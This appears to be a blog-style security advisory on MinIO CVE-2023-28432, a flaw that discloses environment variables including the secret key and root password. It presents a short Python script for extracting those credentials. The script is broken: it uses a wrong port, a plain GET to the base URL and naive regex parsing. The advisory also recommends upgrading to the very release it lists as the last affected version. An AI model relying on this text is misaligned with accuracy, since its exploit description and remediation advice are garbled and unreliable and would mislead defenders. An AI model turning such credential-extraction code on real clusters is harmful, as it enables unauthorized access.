Minio is a widely used Multi-Cloud Object Storage Framework that allows users to store, manage, and access their data across different cloud environments. Minio has recently been identified as having a critical security vulnerability, designated as CVE-2023-28432. This vulnerability exposes sensitive information, including critical access credentials such as MINIO_SECRET_KEY and MINIO_ROOT_PASSWORD. Users of a cluster deployment environment with versions starting from RELEASE.2019-12-17T23-16-33Z to RELEASE.2023-03-20T20-16-18Z are affected. It is strongly recommended that all users upgrade to the patched version, RELEASE.2023-03-20T20-16-18Z, to mitigate the risk associated with this vulnerability.

Here's a sample of code illustrating the issue

import requests
import re

def get_env(url):
  response = requests.get(url)
  html_response = response.text
  env_variables = re.findall(r'(\w+:\s+\w+)', html_response)
  return env_variables

minio_cluster_url = "http://your_minio_cluster_url:900";
env_variables = get_env(minio_cluster_url)

print("Extracted Environment Variables:")
for env in env_variables:
  print(env)

Running this code against an affected Minio cluster deployment environment would result in a list of environment variables being printed, including sensitive data such as the secret key and root password.

Original References

- Minio GitHub Repository: Source code and documentation for the Minio Multi-Cloud Object Storage Framework.
- CVE-2023-28432 National Vulnerability Database (NVD) Entry: The official entry for this vulnerability in the NVD, managed by NIST.

Exploit Details

The vulnerability stems from the fact that the affected versions of Minio return all environment variables, including sensitive ones like MINIO_SECRET_KEY and MINIO_ROOT_PASSWORD, which should ideally not have been disclosed. This information disclosure can lead to unauthorized access and potentially severe consequences to the system and data involved.

All users of distributed deployment environments are impacted by this issue. Therefore, all users should upgrade to the latest version, RELEASE.2023-03-20T20-16-18Z, to resolve this vulnerability and eliminate the risk.

To upgrade your Minio cluster and resolve this issue, follow the official documentation on how to upgrade a Minio cluster deployment.

Conclusion

CVE-2023-28432 is a critical security vulnerability affecting the Minio Multi-Cloud Object Storage Framework. Users with an affected cluster deployment should upgrade to the latest patched version RELEASE.2023-03-20T20-16-18Z as soon as possible to prevent potential unauthorized access and data breaches. By staying up-to-date with the latest security advisories and ensuring that their systems are updated accordingly, users can protect themselves against this vulnerability and maintain the security of their data.

Timeline

Published on: 03/22/2023 21:15:00 UTC
Last modified on: 03/28/2023 16:26:00 UTC